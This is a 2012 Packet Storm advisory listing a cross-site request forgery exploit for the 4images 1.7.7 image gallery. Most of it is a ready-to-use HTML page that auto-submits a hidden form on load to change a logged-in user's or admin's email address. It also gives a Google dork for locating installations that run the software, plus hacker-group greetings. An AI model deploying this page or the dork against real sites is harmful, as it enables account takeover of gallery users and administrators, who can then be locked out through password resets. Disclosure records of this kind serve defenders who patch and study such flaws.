4Images 1.7.7 Cross Site Request Forgery

2012-03-13T00:00:00
ID PACKETSTORM:110766
Type packetstorm
Reporter Dmar al3noOoz
Modified 2012-03-13T00:00:00

Description

                                        
                                            `########################################################################################################  
# Title: 4images - Image Gallery Management System - [CSRF] Change mail user or admin  
# Author: Dmar al3noOoz  
# Mail : wafee_s[at]hotmail.com  
# Name : 4images - Image Gallery Management System  
# dork : Google Dork: "4images - Image Gallery Management System"  
# Software Link : http://www.4homepages.de  
# Version: 1.7.7  
############################################## Exploit ##############################################  
<html>  
<body onload="javascript:fireForms()">  
<script language="JavaScript">  
var pauses = new Array( "1062" );  
function pausecomp(millis)  
{  
var date = new Date();  
var curDate = null;  
do { curDate = new Date(); }  
while(curDate-date < millis);  
}  
function fireForms()  
{  
var count = 1;  
var i=0;  
for(i=0; i<count; i++)  
{  
document.forms[i].submit();  
pausecomp(pauses[i]);  
}  
}  
</script>  
<form method="POST" name="form0" action="http://www.XXXXXX.com/patch/member.php">  
<input type="hidden" name="user_email" value="you mail"/>  
<input type="hidden" name="user_email2" value="you mail"/>  
<input type="hidden" name="action" value="updateprofile"/>  
</form>  
</body>  
</html>  
-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-Greetz-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-  
-=- v4-team.com - Evil-Cod3r - dmar hacker - dr.Dmar - Dmaral7roOob - Ra7aLAlgnob - Mr.law - Alkeasr20 - Mr.black - Cyber-CrysTaL -=-  
-=- Team 19vr - RootAl3noz - all Friend - exploit-db.com -=-  
-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-  
  
  
`